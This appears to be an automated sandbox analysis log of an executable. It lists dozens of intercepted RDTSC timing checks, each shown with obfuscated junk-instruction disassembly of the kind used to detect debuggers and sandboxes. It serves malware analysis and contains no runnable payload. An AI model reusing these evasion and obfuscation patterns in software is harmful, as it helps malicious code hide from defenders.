                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60890F second address: 60891D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FBE444F40A6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608A7C second address: 608A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBE44D3A53Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608A8C second address: 608AA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40AEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608AA4 second address: 608AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608AA8 second address: 608AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608D9D second address: 608DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBE44D3A536h 0x0000000a popad 0x0000000b push ebx 0x0000000c jmp 00007FBE44D3A53Bh 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608DBE second address: 608DDF instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBE444F40A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FBE444F40B3h 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608DDF second address: 608E14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBE44D3A546h 0x00000008 jno 00007FBE44D3A536h 0x0000000e jmp 00007FBE44D3A544h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7879 second address: 5B7886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FBE444F40ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7886 second address: 5B788E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B788E second address: 5B7894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607A46 second address: 607A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44D3A542h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FBE44D3A541h 0x00000010 popad 0x00000011 jnc 00007FBE44D3A53Ch 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607A7F second address: 607A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBE444F40A6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607A8E second address: 607A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607A94 second address: 607A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60CC60 second address: 60CC84 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBE44D3A538h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBE44D3A545h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60CC84 second address: 60CC88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D19D7 second address: 5D1A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBE44D3A536h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 jmp 00007FBE44D3A546h 0x00000019 pop ebx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1A02 second address: 5D1A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FBE444F40A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1A0C second address: 5D1A52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A53Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ch, 72h 0x0000000e lea eax, dword ptr [ebp+12483790h] 0x00000014 jmp 00007FBE44D3A543h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FBE44D3A542h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1A52 second address: 5B6D0D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBE444F40ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FBE444F40A8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D29B3h], ecx 0x0000002d call dword ptr [ebp+122D34B6h] 0x00000033 pushad 0x00000034 jbe 00007FBE444F40B2h 0x0000003a jno 00007FBE444F40A6h 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1B2A second address: 5D1B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1C5D second address: 5D1C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FBE444F40B1h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1C74 second address: 5D1C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jo 00007FBE44D3A536h 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1C86 second address: 5D1C8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D209E second address: 5D20A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D20A3 second address: 5D20DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edi 0x0000000e jmp 00007FBE444F40B8h 0x00000013 pop edi 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 ja 00007FBE444F40A8h 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D21AE second address: 5D21B8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBE44D3A53Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2256 second address: 5D225A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D225A second address: 5D227F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FBE44D3A538h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push esi 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 pop esi 0x00000016 xchg eax, esi 0x00000017 pushad 0x00000018 mov dword ptr [ebp+122D3393h], eax 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D227F second address: 5D2283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2520 second address: 5D252B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FBE44D3A536h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D28F1 second address: 5D28F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D28F5 second address: 5D2937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A542h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d xor dword ptr [ebp+122D27C2h], ecx 0x00000013 jmp 00007FBE44D3A53Eh 0x00000018 popad 0x00000019 push 0000001Eh 0x0000001b mov dword ptr [ebp+1245CDC7h], ebx 0x00000021 push eax 0x00000022 pushad 0x00000023 pushad 0x00000024 js 00007FBE44D3A536h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2BB3 second address: 5D2BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2BB7 second address: 5D2BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2C44 second address: 5D2CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007FBE444F40ACh 0x0000000d jnc 00007FBE444F40A6h 0x00000013 popad 0x00000014 mov dword ptr [esp], eax 0x00000017 jnc 00007FBE444F40B2h 0x0000001d lea eax, dword ptr [ebp+124837D4h] 0x00000023 push esi 0x00000024 mov dword ptr [ebp+122D27DDh], eax 0x0000002a pop edx 0x0000002b nop 0x0000002c jmp 00007FBE444F40AFh 0x00000031 push eax 0x00000032 jmp 00007FBE444F40B1h 0x00000037 nop 0x00000038 mov ecx, dword ptr [ebp+122D2E04h] 0x0000003e lea eax, dword ptr [ebp+12483790h] 0x00000044 mov di, si 0x00000047 nop 0x00000048 jmp 00007FBE444F40B5h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push edx 0x00000051 push eax 0x00000052 pop eax 0x00000053 pop edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2CCA second address: 5B7879 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push edx 0x0000000a jns 00007FBE44D3A53Bh 0x00000010 pop ecx 0x00000011 call dword ptr [ebp+122D24DEh] 0x00000017 pushad 0x00000018 pushad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D25B second address: 60D260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D260 second address: 60D266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D3B8 second address: 60D3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D3BE second address: 60D3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBE44D3A542h 0x0000000a jmp 00007FBE44D3A540h 0x0000000f pushad 0x00000010 jns 00007FBE44D3A536h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D570 second address: 60D588 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBE444F40A6h 0x00000008 jmp 00007FBE444F40AEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599F4B second address: 599F5B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBE44D3A53Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599F5B second address: 599F89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40B4h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBE444F40AEh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599F89 second address: 599F95 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBE44D3A536h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599F95 second address: 599F9A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6179AC second address: 6179B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6179B2 second address: 6179E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnp 00007FBE444F40C9h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6179E0 second address: 6179E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617C7E second address: 617C8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617DFE second address: 617E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617E02 second address: 617E2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FBE444F40A6h 0x00000013 jmp 00007FBE444F40ACh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617E2C second address: 617E32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A093 second address: 61A09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A09B second address: 61A0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A0AB second address: 61A0B9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBE444F40A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A0B9 second address: 61A0BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A0BD second address: 61A0C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A0C3 second address: 61A0C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62460E second address: 624667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FBE444F40ABh 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FBE444F40AFh 0x00000015 jmp 00007FBE444F40B7h 0x0000001a popad 0x0000001b jmp 00007FBE444F40ADh 0x00000020 pushad 0x00000021 jmp 00007FBE444F40AAh 0x00000026 push eax 0x00000027 pop eax 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6247DA second address: 6247E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62496A second address: 624996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE444F40B9h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c je 00007FBE444F40A8h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624996 second address: 6249C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBE44D3A53Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007FBE44D3A549h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6249C7 second address: 6249CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6249CD second address: 6249D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624DA8 second address: 624DAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624DAC second address: 624DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624DB7 second address: 624DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624DBD second address: 624DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624DC3 second address: 624DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624DCA second address: 624DDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FBE44D3A536h 0x0000000a jbe 00007FBE44D3A536h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2744 second address: 5D274A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D274A second address: 5D27BD instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBE44D3A536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FBE44D3A53Ah 0x00000013 js 00007FBE44D3A53Ch 0x00000019 popad 0x0000001a nop 0x0000001b jmp 00007FBE44D3A547h 0x00000020 mov ebx, dword ptr [ebp+124837CFh] 0x00000026 mov dword ptr [ebp+122D3CAAh], ebx 0x0000002c sub cl, FFFFFFD4h 0x0000002f add eax, ebx 0x00000031 ja 00007FBE44D3A539h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FBE44D3A547h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D27BD second address: 5D27D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D27D8 second address: 5D281A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A53Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or dword ptr [ebp+122D17F8h], eax 0x00000012 push 00000004h 0x00000014 mov edi, dword ptr [ebp+122D2EFCh] 0x0000001a nop 0x0000001b push ecx 0x0000001c push ecx 0x0000001d jng 00007FBE44D3A536h 0x00000023 pop ecx 0x00000024 pop ecx 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FBE44D3A544h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624FA7 second address: 624FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnl 00007FBE444F40A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624FB3 second address: 624FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624FB7 second address: 624FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624FC1 second address: 624FC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624FC5 second address: 624FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625112 second address: 625119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625B45 second address: 625B75 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBE444F40A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FBE444F40A8h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBE444F40B4h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625B75 second address: 625B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629C2E second address: 629C50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40B8h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629157 second address: 629172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A541h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629172 second address: 629178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629178 second address: 62917C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62917C second address: 62919A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBE444F40A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007FBE444F40AEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
